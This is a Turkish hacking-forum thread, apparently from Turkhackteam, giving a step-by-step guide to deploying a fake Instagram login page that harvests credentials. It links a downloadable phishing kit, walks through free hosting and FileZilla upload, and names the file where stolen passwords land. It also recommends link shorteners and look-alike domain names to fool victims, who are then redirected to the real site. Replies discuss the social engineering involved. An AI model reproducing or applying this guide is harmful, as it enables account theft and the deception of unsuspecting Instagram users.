Fake Instagram Scripti Kurulum Anlatımı Yeni

ENİGMA1

Uzman üye
31 Ocak 2016
1,961
39
Fake Instagram Scripti Kurulum Anlatımı 19.03.2017

- Fake Instagram Scripti -

- %100 ÇALIŞIYOR 25.03.2017 DENENDİ -


- Gerekli Materyaller -

- FileZilla
- Instagram Scripti
- Hostinger.web.tr Sitesinde Açılmış Host

- İndirme Linki -
Kod:
http://s3.dosya.tc/server11/ihcll9/PHISHING__INSTAGRAM__PACK.rar.html

- Virüs Total -
Kod:
https://www.virustotal.com/tr/file/ebe548cb35f82994afc6d55a9b1250fdcb0f78c3bfa34f7ceae80d27b3a58397/analysis/

FileZilla Programı Olmayanlar İçin
Kod:
https://filezilla-project.org/
- Anlatım -


Arkadaşlar öncelikle kendinize hostinger.web.tr sitesinden bir üyelik alıyorsunuz. Daha sonra üyeliğinizi mail kutunuza gelen mail ile aktif etmeniz gerekiyor. Şimdi hesabımız hazırsa kendimiz için bir host kuralım. Hesabımıza giriş yapalım ve üst panelde bulunan Hosting > Yeni Hesap seçeneğine tıklayalım.

ZkrlvZ.jpg


Daha sonra karşınıza ücretsiz ve ücretli kurabileceğinizi belirten bir sayfa çıkacak. Ücretsiz üzerinden sipariş ver seçeneğine tıklıyoruz.

BPVjVg.jpg


Sonrasında karşınıza host bilgilerini isteyen bir bölüm gelicek. Alt alan adınızı belirleyip şifrenizi giriceksiniz. Yanlız dikkat edin burada gireceğiniz şifre ile filezilla programında hostunuza giriş yapıcaksınız yani şifreyi sallamayın.

R03ZzG.jpg


Sipariş onay bölümünde son olarak bir açıklama isteyecek sizden ve bir ben robot değilim doğrulaması isteyecek.

m3Lbm8.jpg


Siparişinizi verdikden sonra sizi yeni bir sekmeye yönlendirecek. Bu sekmede kurduğunuz hostun üzerine tıklayacaksınız ve yönet seçeneğine tıklayacaksınız.

EgJLkz.jpg


Ve artık hostumuzun panelindeyiz. Birde unutmadan kurduğunuz siteye giriş yapıp "Dear visitor" başlığıyla verilmiş olan onaylama kodunu girmeniz gerekmekte. Sitenizin aktifleşmesi için. Panelimizin sol tarafında biraz aşşağıya indiğimizde bir bilgi kutusu gibi bir şey göreceğiz. Sunucu IP'si, Kullanıcı adı vs. yazan bölüm. Şimdi bu sayfa dursun ve bilgisayarınıza yüklediğiniz filezilla programını açıyorsunuz.

Sırası ile; IP Adresi > Sunucu, Kullanıcı Adı > Kullanıcı Adı, Şifreyede hostu kurarken söylediğim sallamayın dediğim yerde girdiğiniz şifre ile giriş yapıyoruz.

p0P3vq.png


ALJMZr.png



Filezilla programına giriş yaptıktan sonra sitemizin içinde bulunan .htaccess ve default.php dosyalarını siliyoruz. Daha sonra size linkini verdiğim insta fake dosyasının içindeki herşeyi filezilla programı yardımı ile sunucumuza aktarıyoruz.

j8nOvg.png


Sol tarafta bilgisayarımızın içinden insta fake dosyasının içine giriyoruz ve içindekileri tarayıp sağ taraftaki kısma sürüklüyoruz. Daha sonra yüklenmesini bekliyoruz ve yükleme tamamlandığında sitemize giriş yapıyoruz.

Wkld9P.jpg


Buraya girilen kullanıcı adı ve şifreler siteadınız.com/accounts/%3fforce_classic_login/passwords.txt adresine düşüyor.

W0Yv12.png


İşte arkadaşlar Instagram scripti kurulumu bu kadar. Artık bu siteyi yedirmesi size kalmış bir şey. Link kısaltması gibi şeylerde kullanmak telefondaki kurbanınızın giriş yapma olasılığını yükseltebilir. Scriptin en iyi yönlerinden biriside kurbanınız scriptten hesabına giriş yaptığında onu gerçek instagramın sitesine yönlendiriyor. Eğer host adınıda biraz inandırıcı gerçeğine yakın instegram falan gibi şeyler yaparsanız şansınız biraz daha arta bilir. :)

BİR TEŞEKKÜR YETER
 
Son düzenleme:

H2ck1r

Uzman üye
10 Ara 2015
1,195
3
İşe yarar, fakat iyi bir sosyal mühendis olmanız gerekiyor. Çoğu kişi kanıt gibi şeyler isteyebiliyor :)
 

heyecan85

Uzman üye
9 Tem 2015
1,466
4
yonetim panelli fake script hazirliyorum instagrama yonelik bittiginde gerekli kisilerden izin alip burada paylasicam insallah
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.